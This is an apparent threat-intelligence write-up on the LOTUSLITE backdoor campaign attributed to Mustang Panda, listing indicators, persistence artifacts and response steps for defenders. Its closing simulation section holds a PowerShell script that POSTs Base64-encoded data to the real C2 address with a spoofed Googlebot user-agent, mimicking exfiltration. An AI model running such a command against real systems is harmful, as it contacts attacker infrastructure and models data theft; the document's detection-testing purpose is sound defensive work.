SOC Prime Bias: Critical

16 Jan 2026 13:42 UTC

LOTUSLITE Campaign: Targeted Espionage Driven by Geopolitical Narratives

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
LOTUSLITE Campaign: Targeted Espionage Driven by Geopolitical Narratives
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Acronis TRU observed a targeted espionage operation aimed at U.S. government organizations that delivered a malicious DLL backdoor, LOTUSLITE, inside a politically themed ZIP archive. A companion loader executable side-loads the DLL, after which the backdoor beacons to a hard-coded C2 endpoint over HTTPS while spoofing a Googlebot user-agent. The operators establish persistence by creating a dedicated ProgramData directory and adding a Run registry entry. Based on overlapping tradecraft, the activity was linked to Mustang Panda.

Investigation

Analysts unpacked the ZIP and identified the loader binary (Maduro to be taken to New York.exe) alongside the weaponized DLL (kugou.dll). The analysis documented the DLL sideloading flow, beaconing behavior, mutex usage, and the exact persistence artifacts created on the host. Infrastructure review attributed communications to a single IP (172.81.60.97) and a spryt.net-hosted domain, reportedly hosted in Phoenix, Arizona. Attribution to Mustang Panda was assessed with moderate confidence due to shared tactics and infrastructure patterns.

Mitigation

Acronis detections relied on SHA-256 hashes for the malicious binaries and highlighted the specific ProgramData persistence folder and Run key location. Network controls should flag outbound HTTPS connections to the identified IP/domain when paired with a Googlebot user-agent string. Reduce persistence by preventing execution of unknown binaries from ProgramData and removing the associated Run registry entry when discovered.

Response

Immediately isolate affected endpoints, capture volatile data, and preserve the malicious binaries for analysis. Remove the created ProgramData folder and delete the corresponding Run registry value to break persistence. Block connectivity to the C2 IP and domain, and update endpoint detections with the provided file hashes and mutex indicator. Finally, conduct an environment-wide hunt for additional hosts exhibiting the same loader and DLL signatures.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The attacker has compromised a workstation and installed the LOTUSLITE backdoor. To exfiltrate data while blending in with legitimate web‑crawler traffic, the backdoor issues an HTTP POST to the hard‑coded C2 server 172.81.60.97. It explicitly sets the User‑Agent header to “Googlebot” to masquerade as a search‑engine crawler, hoping to slip past perimeter defenses that whitelist such agents. The payload contains Base64‑encoded exfiltrated data.

  • Regression Test Script:

    # LOTUSLITE C2 simulation – powershell
    $c2 = "http://172.81.60.97/receive"
    $ua = "Googlebot"
    $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload"))
    $body = @{ "data" = $data }
    
    try {
        Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
        Write-Host "C2 request sent successfully."
    } catch {
        Write-Error "C2 request failed: $_"
    }
  • Cleanup Commands:

    # Remove any temporary files or lingering network connections
    Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue
    # (No persistent services were created in this simulation)
    Write-Host "Cleanup complete."